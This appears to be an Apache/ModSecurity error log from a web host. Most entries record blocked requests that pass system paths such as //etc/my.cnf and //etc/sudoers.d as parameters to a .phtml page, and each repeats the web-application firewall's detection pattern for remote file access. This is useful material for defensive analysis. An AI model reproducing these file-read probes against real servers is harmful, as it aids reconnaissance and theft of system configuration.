[Thu Mar 19 18:57:42.279836 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.92:55700] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxVhCii7xarUs8iHYWbAAAAgM"]
[Thu Mar 19 18:57:42.432039 2026] [:error] [pid 26799:tid 140411649607424] [client 57.141.18.87:55704] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxVta6ubjKNq_cu4aAFQAAA0s"]
[Thu Mar 19 18:57:42.957674 2026] [:error] [pid 8307:tid 140411607643904] [client 57.141.18.58:55714] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxVr-FhjpZGs9ba8qWDAAAAxA"]
[Thu Mar 19 18:57:43.164645 2026] [:error] [pid 27293:tid 140411674785536] [client 57.141.18.119:55720] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxV_-YZRR_7pZ7nDK2NgAAA8g"]
[Thu Mar 19 18:57:43.858785 2026] [:error] [pid 14269:tid 140411565680384] [client 57.141.18.111:55736] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxVwbLMZ6AikZjR9WG6wAAABU"]
[Thu Mar 19 18:57:44.735577 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.28:55752] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxWBCii7xarUs8iHYWbgAAAhY"]
[Thu Mar 19 18:57:45.131505 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53152] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:57:45.212454 2026] [:error] [pid 15826:tid 140411548894976] [client 57.141.18.52:55766] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxWeoXxyEfFpUF8f841gAAAVc"]
[Thu Mar 19 18:57:45.828446 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.85:55784] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxWfqxLDW4GITHUkSTMgAAARg"]
[Thu Mar 19 18:57:47.099710 2026] [:error] [pid 17653:tid 140411624429312] [client 57.141.18.121:55820] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxW8df6f5d65gmYZSk3QAAAs4"]
[Thu Mar 19 18:57:47.651208 2026] [:error] [pid 7545:tid 140411616036608] [client 57.141.18.46:55832] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxW38B84UptSoTJtY56gAAAY8"]
[Thu Mar 19 18:57:47.992007 2026] [:error] [pid 7235:tid 140411733534464] [client 57.141.18.106:55844] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxW_qxLDW4GITHUkSTMwAAAQE"]
[Thu Mar 19 18:57:48.357891 2026] [:error] [pid 27293:tid 140411641214720] [client 57.141.18.115:55852] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxXP-YZRR_7pZ7nDK2OAAAA8w"]
[Thu Mar 19 18:57:48.511906 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.91:55858] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxXOoXxyEfFpUF8f842AAAAUI"]
[Thu Mar 19 18:57:48.873411 2026] [:error] [pid 21563:tid 140411599251200] [client 57.141.18.72:55862] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxXEpm7ZmxKZTM4bZw7wAAA5E"]
[Thu Mar 19 18:57:49.376936 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.89:55878] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxXeoXxyEfFpUF8f842QAAAVg"]
[Thu Mar 19 18:57:50.663336 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.61:55896] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxXhCii7xarUs8iHYWdwAAAhY"]
[Thu Mar 19 18:57:50.799885 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.86:55900] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxXhCii7xarUs8iHYWeAAAAhY"]
[Thu Mar 19 18:57:50.984516 2026] [:error] [pid 27293:tid 140411733534464] [client 57.141.18.42:55908] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxXv-YZRR_7pZ7nDK2OQAAA8E"]
[Thu Mar 19 18:57:51.342134 2026] [:error] [pid 19655:tid 140411582465792] [client 57.141.18.44:55912] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxX01ujooLWdUDGy4ADgAAAFM"]
[Thu Mar 19 18:57:52.228326 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.72:55928] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxYBCii7xarUs8iHYWfQAAAhU"]
[Thu Mar 19 18:57:56.281830 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.44:55984] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxYgkwaGbbGflqUZD2vQAAAME"]
[Thu Mar 19 18:57:56.283177 2026] [:error] [pid 19655:tid 140411582465792] [client 57.141.18.32:55994] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxY01ujooLWdUDGy4ADwAAAFM"]
[Thu Mar 19 18:57:56.283950 2026] [:error] [pid 7235:tid 140411683178240] [client 57.141.18.42:56000] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxZPqxLDW4GITHUkSTNQAAAQc"]
[Thu Mar 19 18:57:57.167511 2026] [:error] [pid 27293:tid 140411565680384] [client 57.141.18.44:56016] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxZf-YZRR_7pZ7nDK2OwAAA9U"]
[Thu Mar 19 18:57:58.122653 2026] [:error] [pid 19655:tid 140411582465792] [client 57.141.18.53:56034] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxZk1ujooLWdUDGy4AEQAAAFM"]
[Thu Mar 19 18:57:58.329577 2026] [:error] [pid 19655:tid 140411582465792] [client 57.141.18.10:56046] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxZk1ujooLWdUDGy4AEwAAAFM"]
[Thu Mar 19 18:58:00.155177 2026] [:error] [pid 20435:tid 140411624429312] [client 57.141.18.50:56080] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxaJJaM1-0uhhUQJNEHQAAAI4"]
[Thu Mar 19 18:58:00.414301 2026] [:error] [pid 20435:tid 140411557287680] [client 57.141.18.99:56088] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxaJJaM1-0uhhUQJNEHgAAAJY"]
